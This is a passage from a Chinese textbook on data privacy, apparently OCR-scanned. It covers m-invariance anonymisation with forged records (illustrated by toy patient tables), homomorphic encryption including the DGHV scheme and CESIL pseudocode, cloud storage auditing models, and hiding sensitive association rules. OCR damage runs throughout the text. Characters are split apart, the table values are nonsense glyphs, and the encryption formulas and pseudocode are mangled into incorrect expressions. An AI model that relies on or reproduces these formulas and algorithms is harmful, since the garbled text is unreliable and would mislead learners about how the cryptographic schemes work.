David 23 Male 47 905 Gastritis 
Alice 22 Female 47 906 Bronchitis 
Gary 41 Male 47 905 Flu 
Helen 36 Female 47 905 Gastritis 
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续 表 
Name Age Sex Zip. Disease 
Jane 37 Female 47 905 Dyspepsia 
Paul S52 Male 47 906 Dyspepsia 
Ken 40 Male 47 905 Flu 
Linda 43 Femal 47 905 Gastritis 
Steve 56 Male 47 906 Gastritis 
表 9-7b 发 布 信息 表 T(1) 
G.ID Age Sex Zip. Disease 
[21,22] 关 4790* Dyspepsia 
[21,22] * 4790* Bronchitis 
[23,24] 关 4790* Flu 
[23,24] 关 4790* Gastritis 
3 [36,41] * 4790* Flu 
[36,41] 量 4790 # Gastritis 
[37,43] 关 4790* Dyspepsia 
4 [37,43] * 4790* Flu 
[37,43] x 4790* Gastritis 
5 [52,56] * 4790* Dyspepsia 
[52,56] 闪 4790 #* Gastritis 




















连续 表 的 发 布 还 涉及 一 个 问题 一 一 敏感 值 的 缺乏 ,例如 由 表 9-7b 可 知 Bob 患 有 
Dyspepsia 或 者 Bronchitis, 但 是 敏感 值 Bronchitis 在 表 9-8b 中 不 存在 ,也 就 是 说 ,无 论 表 9-8a 
怎么 泛 化 ,攻击 者 都 可 以 从 两 次 的 发 布 表 中 识别 出 Bob 患 有 Dyspepsia。 

为 了 在 支持 新 增 操作 的 同时 ,支持 数据 重 发 布 对 历史 数据 集 的 删除 , 提出 了 zz- 
invariance 匿名 策略 。 研 究 发 现 对 于 任意 一 条 记录 ,只 要 此 记录 所 在 的 等 价 组 在 前 后 两 个 
发 布 版 本 中 具有 相同 的 敏感 属性 值 集合 ,不 同 发 布 版 本 之 间 的 推理 通道 就 可 以 被 消除 。 因 
此 ,为 了 保证 这 种 约束 ,在 这 种 匿名 策略 中 引入 虚假 的 用 户 记 录 , 这 些 用 户 记录 不 对 应 任何 
原始 数据 记录 ,只 是 为 了 消除 不 同 数据 版 本 间 的 推理 通道 而 存在 。 在 这 种 匿名 策略 中 ,对 应 
于 这 些 虚假 的 用 户 记录 ,作者 还 引入 了 额外 的 辅助 表 标识 等 价 类 中 的 虚假 记录 数目 ,以 保证 
数据 使 用 时 的 有 效 性 。 


表 9-8a 原始 信息 表 T(2) 






































Name Age Sex Zip. Disease 
Bob 21 Male 47 906 Dyspepsia 
David 23 Male 47 905 Gastritis 
Emily 25 Female 47 905 Flu 
Gary 41 Male 47 905 Flu 
Ray 54 Male 47 906 Dyspepsia 
Vince 65 Female 47 906 Flu 
Jane 37 Female 47 905 Dyspepsia 
Tom 60 Male 47 905 Gastritis 
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续 表 
Name Age Sex Zip. Disease 
Mary 46 Female 47 906 Gastritis 
Linda 43 Female 47 905 Gastritis 
Steve 56 Male 47 906 Gastritis 
表 9-8b 发 布 信息 表 T(2) 
G.ID Age Sex Zip. Disease 
Gastritis 
1 [21,23] 关 4790* . 
Dyspepsia 
Flu 
2 [25,43] x 4790* Dyspepsia 
Dyspepsia 
Flu 
. [41,46] x 4790* 
Gastritis 
站. D Si 
4 [54,56] x 4790x SP 
Gastritis 
所 Flu 
5 [60,65] x 4790* ja 
Gastritis 

















m-invariance 的 基本 原理 是 : 在 每 个 记录 的 生命 跨度 中 ,该 记录 所 在 组 始终 含有 相同 的 
敏感 属性 集合 ,并 且 集 合 中 的 敏感 值 各 不 相同 。 

表 9-9a 为 对 应 原始 表 9-8a 遵循 m-invariance 规则 的 匿名 发 布 表 , 其 中 cl 和 c2 为 两 个 
伪造 记录 , 表 9-9b 是 伪造 记录 统计 表 , 表 示 在 QI 和 QH 组 中 各 有 一 个 伪造 记录 。 发 布 伪 
造 记 录 统 计 表 是 为 了 更 好 地 进行 数据 分 析 和 挖掘 。 

从 表 9-9a 中 可 以 看 出 ,Bob 的 记录 泛 化 到 第 一 组 ,这 一 组 与 表 9-7b 第 一 组 含有 相同 的 
敏感 属性 集合 {Dyspepsia,Bronchitis} ,尽管 从 表 9-9a 中 可 知 第 一 组 中 有 一 个 伪造 数据 ,但 
是 该 组 每 条 记录 为 伪造 记录 的 可 能 性 都 相同 ,攻击 者 仍然 无 法 识别 出 Bob 的 Disease 属性 。 


表 9-9a ” 含 伪造 数据 的 发 布 表 




















Name G.ID Age Sex Zip. Disease 
Bob _ ee 
1 [21,23] x 4790* EER 
cl Bronchitis 
David Flu 
2 [23,25] x 4790 * 风 
Emily Gastritis 
Jane Dyspepsia 
c2 3 [37,43] * 4790 * Flu 
Linda Gastritis 
Gary Flu 
4 [41,46] x 4790 * _ 
Mary Gastritis 
Ra: Dyspepsia 
5 [54,56] x 4790x 和 生生 
Steve Gastritis 
Tom 加 Gastritis 
6 [60,65] * A4790 # 
Vince Flu 
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表 9-9b 伪造 数据 统计 








Grorp-ID Count 
和 1 
3 1 





9.3 数据 存储 隐私 保护 技术 


如 何 安全 可 靠 地 将 敏感 数据 交 由 服务 器 存储 和 管理 ,是 数据 隐私 保护 中 必须 解决 的 关 
键 问 题 之 一 。 这 是 因为 数据 中 的 隐私 信息 极 易 被 不 可 信 的 存储 管理 者 偷窥 ; 存储 方 有 可 能 
无 意 或 有 意 地 丢失 数据 或 自 改 数据 ,从 而 使 得 数据 的 完整 性 得 不 到 保证 。 

为 应 对 上 述 挑 战 ,应 用 的 技术 主要 包括 加 密 存储 和 第 三 方 审计 技术 。 


9.3.1 同 态 加 密 存储 技术 


对 于 含有 敏感 信息 的 数据 来 说 ,将 其 加 密 后 存储 在 服务 器 就 能 够 保护 用 户 的 隐私 ,然而 
使 用 传统 的 DES、AES 等 对 称 加 密 手段 , 虽 能 保证 对 存储 的 数据 隐私 信息 的 加 解密 速度 ,但 
其 密 钥 管理 过 程 较 为 复杂 ,难以 应 用 于 有 着 大 量 用 户 的 大 数据 存储 系统 ; 使 用 传统 的 RSA 、 
Elgama 等 非 对 称 加 密 手 段 ,虽然 其 密 钥 易 于 管理 ,但 算法 计算 量 太 大 ,不 适用 于 对 不 断 增长 
的 数据 隐私 信息 进行 加 解密 。 同 时 数据 加 密 加 重 了 用 户 和 服务 器 的 计算 开销 ,同时 限制 了 
数据 的 使 用 和 共享 ,造成 了 高 价值 数据 的 浪费 。 因 此 产生 了 同 态 加 密 等 新 的 数据 加 密 存 储 
技术 。 

1. 同 态 加 密 

同 态 是 一 个 数学 概念 ,如 果 EC(fla, 0)) = f(E(a),E(5)), 则 El. ) 是 一 个 同 态 映 射 。 

假设 加 密 操作 为 E(. ) ,明文 为 m, 密 文 为 e, 如 果 针 对 明文 的 操作 了 ,可 以 根据 玉 构 造 出 
了 ,使 得 E(f(m)) 二 f(e), 那么 EE 就 是 一 个 针对 了 的 同 态 加 密 算法 。 

同 态 加 密 是 指 在 不 知道 解密 算法 和 密 钥 的 情况 下 ,可 以 对 密 文 直接 进行 特定 运算 ,而 其 
运算 结果 解密 后 与 用 明文 进行 相同 运算 所 得 的 结果 一 致 。 例 如 ,加 法 同 态 E(x 十 y) 二 E(x) 十 
E(y),z 十 y 一 DCE(Cz) 十 ECy)), 其 中 十 是 密 文 上 的 某 种 运算 ,对 密 文 E(x) 十 E(y) 解 密 后 得 
到 z 十 y。 

【 例 9-2】 凯 撤 密码 对 字符 串 连接 运算 (Concat) 具 有 加 法 同 态 性 。 

解 : 设 凯撒 密码 密 钥 key 王 n(1 一 26 之 间 的 整数 ) .明文 为 某 个 字母 @ , 则 对 应 密 文 为 字 
母 表 ( 循 环 使 用 ) 中 n 之 后 的 字母 。 

设 z 二 HELLO,y 一 WORLD, 取 key 二 13。 则 有 E(x) 二 Encrypt(13,x) 二 Encrypt(13， 
HELLO)=URYYB,E(y)= Encrypt(13,y)= Encrypt(13, WORLD) =JBEYQ。 现 记 : 
E(zt+y)=Concat(z,y)=URYYBJBEYQ, 则 D(E(zx)+E(y))= Decrypt(13,E(z)+E(y))= 
HELLOWORLD=z 十 y。 所 以 凯撒 密码 对 字符 串 连 接 运算 (加 法 运算 ) 具 有 加 同 态 性 。 

如 果 f 可 以 同时 支持 加 法 和 乘法 ,那么 EF 就 是 全 同 态 加 密 算 法 。 
全 同 态 加 密 可 以 对 加 密 数 据 做 任意 功能 和 任意 次 数 的 运算 ,运算 的 结果 解密 后 是 对 明 
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文 做 同样 运算 的 结果 。 这 意味 着 全 同 态 加 密 算法 能 实现 对 明文 所 进行 的 任何 运算 ,都 可 以 
转化 为 对 相应 密 文 进行 恰当 运算 后 的 解密 结果 。 

全 同 态 加 密 用 一 句 话 来 说 就 是 : 可 以 对 加 密 数 据 做 任意 功能 的 运算 ,运算 的 结果 解密 
后 是 相应 于 对 明文 做 同样 运算 的 结果 。 这 和 句 话 是 不 能 说 反 的 ,例如 ,运算 的 结果 加 密 后 是 相 
应 于 对 明文 做 同样 运算 结果 的 加 密 , 这 样 说 是 不 对 的 ,因为 加 密 不 是 确定 性 的 ,每 次 加 密 由 
于 引入 了 随机 数 , 每 次 加 密 的 结果 都 是 不 一 样 的 ,同一 条 明文 对 应 的 是 好 几 条 密 文 。 而 解密 
是 确定 的 。 

同 态 加 密 有 非常 明显 的 使 用 场景 : 允许 第 三 方 在 密 文 e 的 基础 上 进行 下 操作 ,我 们 拿 
到 处 理 完 的 结果 F(e) 后 对 应 进行 解密 可 以 得 到 期 望 的 结果 f(m), 而 第 三 方 在 整个 过 程 中 
都 不 了 解 明文 m。 因 此 可 用 于 数据 存储 、 云 计算 、 安 全 多 方 计算 、 加 密 搜索 .电子 投票 等 多 个 
领域 。 

对 同 态 加 密 直 观 的 比喻 为 : 有 一 位 首饰 商人 Alice 为 了 防止 工人 在 制作 首饰 的 过 程 中 
盗窃 材料 , 想 出 了 一 个 办 法 。 她 向 一 家 公司 定做 了 一 种 箱子 。 该 箱子 是 带 有 挂 锁 的 ,钥匙 只 
有 Alice 本 人 持 有 。 箱 子 两 侧 有 两 个 手套 ,工人 可 以 在 箱子 外 面 使 用 手套 来 操作 放 在 箱子 
里 面 的 金 银 等 材料 来 制作 首饰 。 制 作 完 成 后 ,Alice 使 用 钥匙 打开 箱子 , 拿 出 制作 好 的 首饰 。 
这 样 就 实现 了 让 工人 在 不 直接 接触 材料 的 条 件 下 对 材料 进行 加 工 的 目的 。 

同 态 加 密 的 思想 其 实 很 早 就 有 了 。1977 年 Rivest、Shamir、Adleman 提出 第 一 个 实用 
的 公 钥 加 密 方案 一 一 RSA 体制 。 同 年 由 Rivest、Adleman、Dertouzos 提出 了 全 同 态 加 密 的 
思想 ,最 初 被 称 为 隐私 同 态 。 这 是 因为 他 们 发 现 RSA 算法 本 身 就 具有 乘法 同 态 性 。 此 后 ， 
人 们 一 直 致 力 于 寻找 全 同 态 加 密 算法 。 但 在 2009 年 之 前 的 很 长 时 间 里 都 没有 获得 满意 
结果 。 

2009 年 ,IBM 实习 研究 员 ( 斯 坦 福 大 学 博士 研究 生 )Gentry 发 明了 一 种 基于 理想 格 的 
全 同 态 加 密 方案 ,获得 了 一 致 高 度 评价 。 但 该 方案 复杂 度 太 高 ,很 难 实用 化 。2010 年 ， 
Dijk、Gentry 等 人 又 提出 了 另外 一 种 更 加 简洁 易 懂 的 全 同 态 加 密 方案 : 基于 整数 ( 环 ) 的 全 
同 态 加 密 方案 (DGHV)。 但 该 方案 计算 复杂 度 和 开销 仍然 较 大 ,难以 实现 。2011 年 ， 
BrakerSki、Gentry 和 Vaikuntanathan 构造 了 BGYV 方案 。 这 是 目前 效率 最 高 的 全 同 态 加 密 
方案 。 同 年 ,Gentry 和 Halevi 对 该 方案 进行 了 改进 ,提出 了 GHS 方案 。2012 年 , Halevi 和 
Shoup 利用 C++ 语言 和 NTL 数学 函数 库 编写 了 实现 BGV 方案 的 开源 软件 包 HELib, HE 
是 英文 Homomorphic Encryption 的 缩写 。 

2. 同 态 加 密 方案 

通常 一 个 公 钥 密码 体系 由 3 个 算法 组 成 : KeyGen、Encrypt 和 Decrypt, 且 这 3 个 算 
法 必须 是 高 效 的 , 即 其 运行 时 间 最 大 为 安全 参数 和 的 某 个 多 项 式 poly(A) 。 

KeyGen 使 用 安全 参数 生成 两 个 密 钥 : 公 钥 Pk 和 私 钥 Ss。Encrypt( Px ,m) 使 用 公 钥 
Pi 将 消息 (明文 )m 映射 为 密 文 <。Decrypt 使 用 私 钥 Si 将 密 文 c 映射 为 明文 m。 

同 态 加 密 方案 形式 化 描述 为 : 

Encrypt(m): m+t+2r+pg 

Decrypt(c): (cmodp) mod 2 一 (c — px[c/p|)mod?2 = Lsb(c) XOR Lsb([c/p |) 

公式 中 的 p 是 一 个 正 的 奇数 ,gq 是 一 个 大 的 正 整 数 ( 没 有 要 求 是 奇数 , 它 比 p 要 大 得 
多 ),p 和 9g 在 密 钥 生成 阶段 确定 ,p 看 成 是 密 钥 。 而 7 是 加 密 时 随机 选择 的 一 个 小 的 整数 
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(可 以 为 负数 ) 。 

这 里 约定 : 一 个 实数 模 p 为 :a mod p = a 一 [|e/ 记 |*p,|a | 表示 最 近 整 数 , 即 有 唯一 
整数 在 (a 一 1/2, a 十 1/2] 中 。 所 以 a mod p 的 范围 也 就 变 成 了 (一 p/2,p/2 ]。 这 个 和 我 们 
平时 说 的 模 p 范围 是 不 一 样 的 ,平时 模 p 范围 是 [0, p 一 1], 那 是 因为 模 公式 中 是 向 下 取 整 : 
amodp =a - floor(a/p)*p。 

Lsb 是 最 低 有 效 位 ,因为 是 模 2 运算 ,所 以 结果 就 是 这 个 二 进 制 数 的 最 低位 。 

上 面 这 个 加 密 方案 显然 是 正确 的 , 模 p 运算 把 pg 消去, 模 2 运算 把 2r 消去 ,最 后 剩 下 
明文 m。 明 文 mE€ 10,1} ,是 对 位 进行 加 密 的 ,所 得 密 文 是 整数 ,因此 方案 的 明文 空间 是 {0,1)， 
密 文 空间 是 整数 集 。 

在 全 同 态 加 密 中 , 除了 公 钥 密码 体系 的 3 个 算法 之 外 , 还 包含 第 四 个 算法 : Evaluate 
算法 ( 密 文 计算 ) ,这 个 算法 的 功能 是 对 输入 的 密 文 进行 计算 。 它 的 作用 就 是 对 于 给 定 的 功 
能 函数 了 以 及 密 文 ci ,co，… ,ci 等 做 运算 (cscs,…,c)。 例 如 ,对 密 文 做 相应 的 整数 加 、 
减 、 乘 运算 。 

全 同 态 加 密 方案 的 基本 要 求 是 : (解密 ) 正 确 性 .保密 性 (Evaluate 不 会 泄露 关于 了 的 信 
息 )、 紧 次 性 (输出 密 文 c 的 长 度 与 f 无 关 ) .语义 安全 性 (可 以 对 抗 CPA 攻击 ) 。 

如 果 将 pg 看 成 公 钥 ,以 上 方案 可 以 看 成 是 对 称 加 密 方案 。 但 由 于 是 公开 的 ,所 以 如 
果 把 pg 看 成 公 钥 , 私 钥 p 立刻 就 被 知道 了 (p 二 pq/g)。 怎 么 办 呢 ? 在 上 面 的 加 密 算法 中 ， 
当 对 明文 0( 数 字 零 ) 进 行 加 密 时 , 密 文 为 2r 十 pq, 所 以 构造 一 个 集合 {zi: zi 二 27; 十 pqi}) , 公 
钥 Pi 就 是 这 个 集合 {zx;} ,加 密 时 随机 地 从 {zi;}) 中 选取 一 个 子 集 S, 按 如 下 公式 进行 加 密 

Enc(m): m 十 2r 十 sum(S); 其 中 sum(S) 表 示 对 S 中 的 zz; 进行 求 和 。 

由 于 sum(S) 是 一 些 0 的 加 密 密 文 之 和 ,所 以 对 解密 并 不 影响 ,整个 解密 过 程 不 变 。 

这 个 方案 是 安全 的 ,就 是 DGHYV 方案 。 其 安全 性 依赖 于 “ 求 近似 整数 最 大 公约 数 ” 这 个 
困难 问题 。 

3. 支持 算术 运算 的 同 态 加 密 方案 

基于 理想 格 的 可 计算 加 密 方 案 (Computable Encryption Scheme Based on Ideal 
Lattice,CESIL) 是 一 种 能 够 在 一 定 范围 内 支持 多 次 密 文 加 法 和 乘法 混合 运算 的 同 态 加 密 方 
案 , 包 括 密 钥 生 成 .加密 、 解 密 及 密 文 运算 4 个 算法 。 

该 方案 首先 借助 多 项 式 环 重 新 定义 向 量 的 加 法 和 乘法 运算 ,构建 多 项 式 系数 向 量 环 ; 然 
后 利用 理想 格 在 向 量 环 上 划分 剩余 类 ,建立 商 环 及 其 代表 元 集合 ;最 后 ,将 整数 明文 映射 为 
代表 元 ,并 用 代表 元 所 在 剩余 类 的 其 他 元 素 蔡 换 该 代表 元 ,以 对 明文 进行 加 密 。 商 环 的 运算 
特性 保证 CESIL 方案 支持 对 密 文 的 加 法 和 乘法 运算 。 在 实现 CESIL 方案 时 ,利用 快速 傅 
里 叶 变换 (FFT) 算 法 进一步 提高 运算 效率 减少 密 钥 长 度 。 

算法 描述 : 

(1) 密 钥 生成 算法 Gen。 

输入 : 整数 nn,N; 输出 : nn 维 向 量 5 和 6 一 1。 

Do{ 随机 生成 正 整数 范围 内 的 n 个 元 素 构成 数组 b 
b fft = fft(b); 


IF b_fft 含 0 元 素 
CONTINUE; 
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b-1 = ifft( b fft -1); 
lene— lb :|; 
J}WHILE ( len >= 1 / (2N)) 
其 中 {ft(5) 是 快速 傅 里 叶 变 换 (FFT) 算 法 ,以 提高 算法 效率 ,这 样 可 以 在 O(n log n) 时 
间 复 杂 度 内 算出 2 的 循环 矩阵 的 道 和 矩阵 ; ifft 为 fft 的 逆 变 换 时 间 复 杂 度 也 为 O(n log n)。 
密 钥 生成 算法 Gen(n,N) 返 回 密 钥 5b 和 其 道 矩 阵 0  。 其 中 盖 指 定 了 向 量 的 维度 ,” 越 
大 ,技术 复杂 度 越 高 ,算法 也 越 安全 ,n 也 限定 了 明文 的 范围 为 [ 0，2z) ,超出 此 范围 的 明文 
在 加 密 是 就 不 能 映射 为 n 维 向量 。 失 效 点 N, 只 有 满足 Wn 三 N2", [0,N) 内 的 运算 才能 
保证 同 态 性 ,否则 运算 可 能 失效 。 
(2) 加 密 算法 Enc。 
输入 : 密 钥 5, 正 整 数 明 文 p; 输出 : n 维 列 向 量 c。 


FOR(i = 0);i<n;it+) { c[i]<((q>>i)&0x01);//q 为 明文 空间 中 的 元 }// c[i] 储 存 明文 p 二 进 制 
表示 的 第 并 位 


随机 生成 整数 范围 内 的 维 列 向 量 r ,和 且 1 二 0; 
c<-c+b@r;// 为 向 量 间 的 乘 运 算 


整数 转化 为 向 量 的 过 程 用 数组 来 记录 二 进 制 的 每 一 位 ,利用 位 运算 可 以 提高 效率 。 
(3) 解密 算法 Dec。 

输入 : 密 钥 5,0-1, 密 文 c; 输出 : 正 整 数 p 

cc-bO[b Q@c];p 一 0; 

FOR (i<-0;i<n;it+) pp+c[i]<<i; // 利 用 c[i] 还 原 p 

(4) 运算 算法 Cal。 

输入 : cl 与 c2 一 一 密 文 操 作 数 ; op 一 一 明文 的 操作 符 。 

输出 : c 一 一 密 文 运算 结果 。 


IFop=="+" Cc<-ci+c, 


mm 


IF op == cca+( 一 cz) 

IFop== "x" cc 由 c， 

了 op==y"f cciQc， 

IFc 儿 2"// 不 可 除 c 一 NOLL} 

运算 算法 Call(c ,cs ,op) 将 利用 所 给 操作 符 op 对 密 文 直接 运算 ,opE {十 ,一 ,XX/}), 减 
法 运算 是 加 法 运算 的 逆 运 算 , 减 cs 相当 于 加 一 c; ,但 由 于 减法 使 向 量 元 素 可 能 为 负 , 当 运算 
次 数 增加 时 ,会 使 运算 结果 在 失效 点 作用 范围 [0,N) 内 时 也 不 一 定 满足 同 态 性 。 所 以 ,算法 
支持 有 限 次 数 的 减法 ,也 不 满足 任意 密 文 的 除法 。 同 时 , 当 明 文 运算 结果 不 在 失效 点 作用 范 
围 [0,NN) 内 时 方法 可 能 失效 (Vn 三 N 达 2"), 即 失 N 效 点 需要 大 于 变量 的 最 大 值 ,以 防止 解 
密 结果 出 错 。 

使 用 CESIL 可 实现 同 态 加 密 图 像 密 文 编辑 系统 ,可 以 在 不 解密 的 情况 下 对 图 像 进 行 纺 
辑 , 而 且 对 编辑 后 的 密 文 图 像 解 密 ,等 效 于 直接 编辑 明文 图 像 。 

图 像 编 辑 本 质 是 对 像素 的 颜色 分 量 进行 一 些 算术 运算 ,如 果 将 图 像 每 个 像素 的 每 种 颜 
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色 分 量 都 看 成 一 个 [0,255] 区 间 的 整数 ,使 用 CESIL 对 密 文 像素 颜色 分 量 计算 就 可 密 文 图 
像 的 编辑 。 灰 度 图 像 只 需要 处 理 一 种 颜色 分 量 , 实 现 是 最 简单 的 。 


9.3.2 数据 审计 技术 


当 用 户 将 数据 存储 在 云 服务 器 中 时 ,就 走失 了 对 数据 的 控制 权 。 如 果 云 服务 提供 商 不 
可 信 , 其 可 能 对 数据 进行 算 改 .丢弃 , 却 对 用 户 声称 数据 是 完好 的 。 为 了 防止 这 种 危害 ,提出 
了 云 存储 中 的 审计 技术 。 

云 存储 审计 是 指数 据 拥有 者 或 者 第 三 方 机 构 对 云 中 的 数据 完整 性 进行 审计 。 通 过 对 数 
据 进行 审计 ,确保 数据 不 会 被 云 服务 提供 商 自 改 丢弃 ,并 且 在 审计 的 过 程 中 用 户 的 隐私 不 
会 被 泄露 。 

当前 已 有 很 多 研究 者 对 云 存储 中 的 审计 进行 了 研究 。Ateniese 等 人 提出 了 一 种 可 证 明 
的 数据 持 有 (Provable Data Possession,PDP) 模 型 ,该 模型 可 以 对 服务 器 上 的 数据 进行 完整 
性 验证 。 该 模型 先 从 服务 器 上 随机 采样 相应 的 数据 块 , 并 生成 持 有 数据 的 概率 证 据 。 客 户 
端 维持 着 一 定数 量 的 元 数据 ,并 利用 元 数据 来 对 证 据 进 行 验证 。 在 该 模型 中 ,挑战 应 答 协议 
传输 的 数据 量 非常 少 ,因此 所 耗费 的 网 络 带宽 较 小 。 

Juels 等 人 提出 可 恢复 证 明 (Proof Of Retrievability, POR) 模 型 ,该 模型 主要 利用 纠 错 
码 技术 和 消息 认证 机 制 来 保证 远程 数据 文件 的 完整 性 和 可 恢复 性 。 在 该 模型 中 ,原始 文件 
首先 被 纠 错 码 编码 并 产生 对 应 标签 ,编码 后 的 文件 及 标签 被 存储 在 服务 器 上 。 当 用 户 选 择 
服务 器 上 的 某 个 文件 块 时 ,可 以 采用 纠 错 码 解码 算法 来 恢复 原始 文件 。POR 模型 面临 的 挑 
战 在 于 需要 构建 一 个 高 效 和 安全 的 系统 来 应 对 用 户 的 请 求 ,Shacham 等 人 改进 了 POR 模 
型 。 他 们 的 模型 构建 基于 BLS 短 签名 (BLS shortsignature) , 即 基 于 双 线 性 对 构造 的 数字 
签名 方案 ,该 模型 拥有 很 短 的 查询 和 响应 时 间 。 

上 述 方案 都 只 能 适用 于 静态 数据 的 审计 ,无 法 支持 对 动态 数据 的 审计 。Ateniese 等 人 
改进 了 PDP 模型 ,该 模型 基于 对 称 密 钥 加 密 算法 ,并 且 支 持 数据 的 动态 删除 和 修改 。 
Erway 等 人 改进 了 PDP 模型 ,提出 了 DPDP 模型 。 该 模型 扩展 了 传统 的 PDP 模型 以 支持 
存储 数据 的 更 新 操作 ,该 操作 的 时 间 复 杂 度 为 0(1) 到 O(lgn)。WangQ 等 人 改进 了 前 人 的 
POR 模型 ,通过 引入 散 列 树 来 对 文件 块 标签 进行 认证 。 同 时 ,他 们 的 方法 也 支持 对 数据 的 
动态 操作 ,但 是 此 方案 无 法 对 用 户 的 隐私 进行 有 效 的 保护 。 


9.4 ”数据 挖掘 隐私 保护 技术 


随 着 技术 的 进步 ,数据 挖掘 过 程 中 的 隐私 保护 问题 逐渐 走 进 了 人 们 的 视野 。 隐 私 保护 
数据 挖掘 , 即 在 保护 隐私 前 提 下 的 数据 挖掘 ,其 主要 关注 点 有 两 个 : 一 是 对 原始 数据 集 进行 
必要 的 修改 ,使 得 数据 接收 者 不 能 侵犯 他 人 隐私 ; 二 是 保护 产生 模式 ,限制 对 大 数据 中 敏感 
知识 的 挖掘 。 衡 量规 则 是 冲突 度 、 公 开 度 。 

冲突 度 是 指 事 务 所 支持 敏感 规则 的 数目 , 每 次 选择 冲突 度 最 小 的 数据 记录 进行 修改 ， 
能 在 一 定 程度 上 解决 修改 一 条 记录 对 多 条 规则 的 影响 。 

根据 敏感 规则 的 公开 度 来 控制 修改 对 应 数据 记录 的 比例 , 进而 可 以 对 不 同 敏感 规则 实 
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现 不 同 程度 的 隐藏 效果 。 
9.4.1 关联 规则 的 隐私 保护 


关联 规则 的 隐私 保护 主要 有 两 类 方法 : 

第 一 类 是 变换 (distortion) , 即 修改 支持 敏感 规则 的 数据 ,使 得 规则 的 支持 度 和 置信 度 
小 于 一 定 的 阔 值 而 实现 规则 的 隐藏 。 

第 二 类 是 隐藏 (blocking) ,该 类 方法 不 修改 数据 ,而 是 对 生成 敏感 规则 的 频繁 项 集 进行 
隐藏 。 

这 两 类 方法 都 对 非 敏感 规则 的 挖掘 具有 一 定 的 负面 影响 ,本 书 只 介绍 第 一 类 方法 。 

数据 变换 法 的 基本 思想 是 对 于 原始 数据 库 中 的 敏感 事务 , 通过 删除 项 或 插入 项 的 方式 
使 敏感 规则 的 支持 度 或 置信 度 降 低 到 某 个 阔 值 以 下 。 

将 原始 数据 集 用 布尔 矩阵 表示 , 矩阵 的 每 一 行 代表 一 个 事务 ,每 一 行 中 的 1 代表 对 应 
列 所 指 的 项 出 现在 事务 中 , 0 表示 对 应 的 项 不 出 现在 事务 中 。 

数据 变换 法 通过 将 敏感 事务 中 的 1( 0) 变 成 0( 1) 的 方式 对 原始 数据 集 做 修改 , 使 敏感 
规则 的 支持 度 或 置信 度 降 低 到 预先 指定 值 以 下 ,从 而 实现 隐藏 规则 。 

在 最 小 化 修改 数据 集 的 情况 下 , 通过 删除 特定 记录 的 某 些 项 或 插入 某 些 项 实现 敏感 规 
则 的 隐藏 。 每 次 隐藏 一 条 敏感 规则 、 每 次 只 修改 对 应 记录 的 一 项 , 这 种 策略 可 以 保证 对 原 
数据 集 的 影响 最 小 。 

具体 有 以 下 3 种 隐藏 关联 规则 的 策略 

(1) 降低 规则 支持 度 。 如 表 9-10 所 示 ,在 数据 集中 规则 AC※B 的 支持 度 为 50%, 首 
先 找到 支持 规则 AC※B 的 记录 Ti, 通过 修改 记录 T 中 对 应 C 项 的 1 值 为 0 使 得 规则 AC 
※B 的 支持 度 降低 1; 或 修改 AB 的 值 由 11 变 为 01、10 之 一 。 如 果 敏 感 规则 的 支持 度 为 
45% ,那么 记录 AC※B 就 认为 得 到 了 隐藏 。 


表 9-10 交易 事务 数据 集 








Group-ID Count Group-ID Count Group-ID Count 
T ABC Ts ABC Ts A 
T: ABC TD AB Te AC 








(2) 降低 同时 包含 X 和 Y 的 记录 中 X 或 Y 的 支持 度 实现 降低 规则 X ※Y 的 支持 度 。 
如 表 9-10 所 示 ,规则 AC※B 在 数据 集中 置信 和 度 为 75%% ,为 降低 其 置信 度 , 可 以 选择 记录 
T; ,将 对 应 C 项 的 值 由 0 修改 为 1, 使 规则 AC※B 的 置信 度 降 低 为 60% 。 

依照 此 种 方法 可 以 将 对 应 敏感 规则 的 置信 和 度 降 低 到 规定 的 阅 值 以 下 ,从 而 使 敏感 规则 
得 以 隐藏 。 也 可 以 用 上 面 降低 规则 AC※B 支持 度 的 方法 降低 其 置信 和 度 。 

(3) 通过 增加 不 含 Y 的 记录 中 XX 的 支持 度 或 是 降低 同时 包含 X、Y 记录 中 的 支持 度 
来 实现 降低 规则 X※Y 的 置信 和 度 。 

根据 以 上 3 种 隐藏 关联 规则 的 策略 ,可 以 有 5 种 算法 : 

(1) 只 修改 支持 单一 敏感 规则 的 频繁 项 ; 

(2) 通过 降低 支持 度 或 置信 和 度 来 隐藏 关联 规则 ; 

(3) 基于 对 非 敏 感 信息 的 影响 大 小 来 选择 降低 支持 度 或 置信 和 度 ; 
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(4) 每 次 隐藏 一 条 规则 ; 

(5) 每 次 降低 支持 度 或 置信 度 的 一 个 单位 。 

以 上 几 点 可 保证 数据 记录 的 修改 对 发 布 的 数据 库 影 响 最 小 。 

1. 基于 修改 频繁 项 集 的 关联 规则 隐藏 

采用 数据 扰乱 的 关联 规则 隐藏 的 优点 是 实现 简单 、 计 算 代价 小 , 但 隐藏 的 效果 难以 估 
计 。 后 来 出 现 了 基于 修改 频繁 项 集 的 方法 。 它 们 的 特点 是 对 支持 敏感 规则 的 频繁 项 集 进行 
隐藏 ,而 不 是 直接 对 数据 项 进行 修改 。 

关联 规则 挖掘 的 一 个 关键 步骤 是 寻找 频繁 项 集 , 由 频繁 项 集 得 出 关联 规则 是 相对 简单 
的 ,由 此 可 以 考虑 从 修改 频繁 项 集 入 手 来 实现 关联 规则 的 隐藏 。 

通过 处 理 敏 感 频繁 项 集 来 隐藏 关联 规则 的 思想 包括 ， 

(1) 对 交易 数据 库 进行 扫描 建立 一 个 关于 交易 项 的 倒 排 序 文件 ,该 文件 包含 数据 集中 
所 有 项 、 对 应 支持 度 和 项 所 在 数据 记录 的 记录 号 , 该 结构 按照 频繁 度 降序 排列 , 通过 倒序 
文件 能 快速 找到 要 处 理 的 记录 ; 

(2) 运用 安全 策略 找 出 需要 进行 处 理 的 频繁 项 集 ; 

(3) 根据 要 处 理 的 频繁 项 集 找 出 对 应 交易 记录 , 倒序 文件 在 此 处 起 到 快速 定位 交易 项 
的 作用 ; 

(4) 根据 数据 拥有 者 指定 的 公开 度 对 原始 数据 集 进行 清洗 生成 新 的 数据 集 。 

2. 基于 数据 阻塞 方法 的 敏感 规则 隐藏 

通过 将 数据 项 值 由 1 变 为 0, 或 者 由 0 变 为 1 可 以 降低 规则 的 支持 度 和 置信 度 ,这 种 方 
法 简便 有 效 。 但 是 对 于 有 些 数据 集 , 如 病人 诊断 记录 等 ,采用 此 方法 将 会 产生 不 可 预料 的 结 
果 , 可 能 导致 医生 的 诊断 产生 在 错误 的 数据 挖掘 结果 上 。 这 就 暴露 了 数据 修改 方法 的 副 作 
用 : 可 能 产生 一 些 原本 不 存在 的 规则 或 隐藏 非 敏 感 规则 。 

